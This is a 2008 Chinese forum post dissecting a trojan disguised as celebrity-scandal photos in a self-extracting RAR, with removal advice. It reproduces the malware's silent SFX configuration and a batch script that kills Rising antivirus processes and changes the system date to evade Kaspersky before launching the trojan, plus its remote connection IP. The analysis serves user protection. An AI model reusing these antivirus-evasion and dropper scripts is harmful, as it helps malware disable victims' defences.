足球比分直播
NBA比分直播
官方微博
官方抖音
官方微信
捐赠下载币
登录
注册
游客
帖子:
今日:
我的主题
我的回复
我的收藏
好友近况
登录IP: 172.70.126.24
首页
门户
我的空间
搜索
社区服务
银行
帮助
勋章中心
基本信息
到访IP统计
管理团队
管理操作
在线会员
会员排行
版块排行
帖子排行
推荐排行
默认
最新NBA篮球下载
最新足球赛事下载
最新足球精华下载
经典篮球赛事下载
经典足球赛事下载
高清区下载
天下足球网
»
超级水吧
»
解密:“艳照门”背后三大陷阱---病毒!!
上一主题
下一主题
新 帖
主题 : 解密:“艳照门”背后三大陷阱---病毒!!
复制链接
|
浏览器收藏
|
打印
加为好友
小高
级别: 替补球员
作者资料
发送短消息
UID:
2451
精华:
0
发帖:
129
积分:
4126 点
足球分:
220 点
下载币:
0 元
所属豪门: 红魔之家
在线时间: 133(时)
注册时间:
2007-09-15
最后登录:
2012-06-16
0
发表于: 2008-03-01 16:43
全看
|
小
中
大
解密:“艳照门”背后三大陷阱---病毒!!
解密:“”背后三大陷阱 测试环境 虚拟机系统:windows xp2
下载软件:迅雷
杀毒软件:瑞星2008(打了最新补丁包)
一、中招过程
朋友好奇,寻找图片。在百度某贴吧中看到一条信息,提供艳照下载,并且给出了链接地址“
http://guilin123.
*.com/yanmenzhao.rar”于是迫不及待地用迅雷下载,下载的过程中“迅雷安全中心”弹出病毒威胁警告对话框,由于是测试忽略,点击“继续下载”。(图1)
为了测试,笔者的迅雷设置了“下载完成后杀毒”。下载完成后,瑞星病毒扫描后提示“发现2个病毒,清除失败!”(图2)
二、病毒分析
下载完成的这个名称为yanmenzhao,大小为1.04M文件是个压缩文件,后缀为rar。右键单击选择“解压到yanmenzhao下”,解压后为yanmenzhao.exe,其后缀为exe,这是个自动解压文件,估计攻击者一定在其中做了文章。(图3)
这时千万不能直接双击打开,打开后一定会运行自解压脚本就会中招。先打开WinRAR压缩软件,然后通过“文件”→“打开压缩文件”来打开yuanmenzhao.exe,果然在其下有两个文件:.rar、ymz.exe。第一个文件应该就是图片压缩包,而第二个就是木马压缩文件。同时在WinRAR的右侧窗格中发现如下代码:(图4)
Path=%systemroot%
Setup=ymz.exe
Presetup=.rar
Silent=1
Overwrite=1
解释如下:
第一行是文件的解压路径,在系统根目录下;
第二页是解压后自动运行ymz.exe;
第三行是在解压之前先解压.rar,达到掩人耳目,看不到ymz.exe文件,其实它已经运行了;
第四行是隐藏文件,达到更隐蔽;
第五行是覆盖目录下的同名文件,以容错更可靠。
用同样的方法在WinRAR中解压ymz.exe,发现下面5个文件:(图5)
1.bat
1.exe
1.vbs
knlps.exe
knlps.sys
同样在右边有自解压脚本代码:
Path=%systemroot%\temp
SavePath
Setup=1.vbs
Silent=1
Overwrite=1
原理好上面的一样,只不过是解压到系统临时目录下。
用记事本打开1.vbs分析,代码如下:
CreateObject("WScript.Shell").Run "cmd /c 1.bat",0
很明显,是调用1.bat文件。
用记事本打开1.bat文件,代码及其解释如下:
@ECHO OFF
knlps.exe -l >PID.txt
FINDSTR /i "RavMon.exe" PID.TXT >>RAV.txt
FINDSTR /i "RavMonD.exe" PID.TXT >>RAV.txt
FINDSTR /i "CCenter.exe" PID.TXT >>RAV.txt
FOR /F "eol=; tokens=1 delims= " %%1 in (RAV.txt) do knlps.exe -k %%1
上述代码是获取瑞星组件的进程ID并通过knlps.exe结束瑞星的进程。
set date=%date%
date 1990-01-01
date 1990-01-01
上述代码是修改系统时间使卡巴监控失效,这句是关键破卡巴查杀的程序流,没这句被杀木马就会被杀。
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 15
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End
上述代码是倒计时等待15秒
:Next
%systemroot%\temp\1.exe 这个是你木马的名称
for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
上述代码第二回行就木马名称的解压目录,第三行行是倒计时等待结束后运行木马并删除。
date 2007-10-27 aaa
date %date% aaa
上述代码是恢复系统时间(卡巴监控)
RD /S /Q %systemroot%\temp\
上述代码的含义是删除临时文件清除痕迹。
从上面的分析可以看出该自解压包木马的运行机制是,先通过脚本终结瑞星和卡巴斯基,然后运行真正的木马程序,即1.exe,最后清除痕迹。
三、运行病毒
1、瑞星被终结
分析完毕,然后双击yanmenzhao.exe看看中毒症状。为了分析病毒的运行状况,事先打开了瑞星的“实时监控”和“任务管理器”,以观察病毒运行状态。运行后瑞星没有任何提示,任务栏中的瑞星实时监控图标消失,看来瑞星被终结了。另外,在任务管理中出现了一个cscript.exe进程见图6,很快地闪动,鼠标无法选择结束,大概几秒钟后该进程消失,在进程管理器中有多了2个svchost.exe进程见图7。(笔者在测试前备份了进程表,以前的为5个,多了2个)(图6)(图7)
2、可疑的网络连接
在命令提示符下敲入命令:
netstat -ano
查看网络端口连接情况,果然发现了两个可疑IP地址的端口连接:(图8)
TCP 192.168.131.72:1098 116.20.215.181:8008 ESTABLISHED 1916
TCP 192.168.131.72:1099 116.20.215.181:2630 ESTABLISHED 424
这两个连接正好是刚才创建的两个svchost.exe进程创建的。其中的IP 116.20.215.181应该是攻击者的IP或者是一个中转IP。打开
www.ip
138.com查询,得知是广东省佛山市电信。(图9)
四、清除病毒
1、结束进程
在结束进程的发现这两个svchost.exe进程之间互相保护,当结束了其中的一个,另一个马上会重新新建一个。因此手工结束速度太慢,通过批处理命令来清除:
把如下代码保存为kill.bat,双击即可。
@echo off
taskkill /f /pid 1916
taskkill /f /pid 424
exit
提示:其中的pid是随机的,一定要找到可疑的svchost.exe进程的pid,如果结束了系统启动的svchost.exe的话,系统就会关机或者重启。确定的方法,可以参考图8。
2、删除服务
运行services.msc打开“服务”工具,通过分析发现了一个可疑的服务项。
服务名称为:Workstain
显示名称:qmijiu
描述:Wicrosoft .NET Framework TPM
可执行文件路径:c:\WINDOWS\system32\svchost.exe -k Workstain
启动类型:自动
服务状态:已启动
评析:该服务项和Workstation非常相似,并且描述极具欺骗性,攻击者非常狡猾。(图10)
提示:在禁用服务的过程中发现,如果不先结束两个svchost.exe进程,发现根本无法禁用,当你选择禁用该服务,点击确定,它马上改为“自动”运行,可见这也是进程保护在作怪。因此必须把两个进程结束掉再禁止服务。最彻底的是用命令把该服务删除,命令为:
sc delete qmijiu
3、文件删除
(1)C:\WINDOWS目录下的(图11)
.rar
ymz.exe
(1)C:\WINDOWS\system32目录下的(图12)
Workstain.drv
Sharing.dll
总结:该木马病毒利用大众的猎奇心理,把木马和图片打包在一起,然后通过WinRAR的自解压功能使得木马得以运行。其原理比较简单,但象朋友这样的人却屡屡中招。这例“”木马病毒给我们的启示是:
1、做好自律,不去猎奇浏览不雅的东西;
2、在系统中要设置显示文件的后缀,这样可以通过文件后缀就可以判断文件的类型。
3、对自解压文件要非常小心,千万不要直接打开,应该选择用winRAR软件打开,看看有没有可疑的脚本和程序。总之,在思想上和技术上都做好准备,不要成为“”木马病毒的下一个受害者。
天下足球网启用捐赠制!请提前捐赠下载币以免影响下载!感谢球迷的支持!点这里捐赠获得下载币!!!
来自:
顶端
回复
引用
分享
上一主题
下一主题
天下足球网
»
超级水吧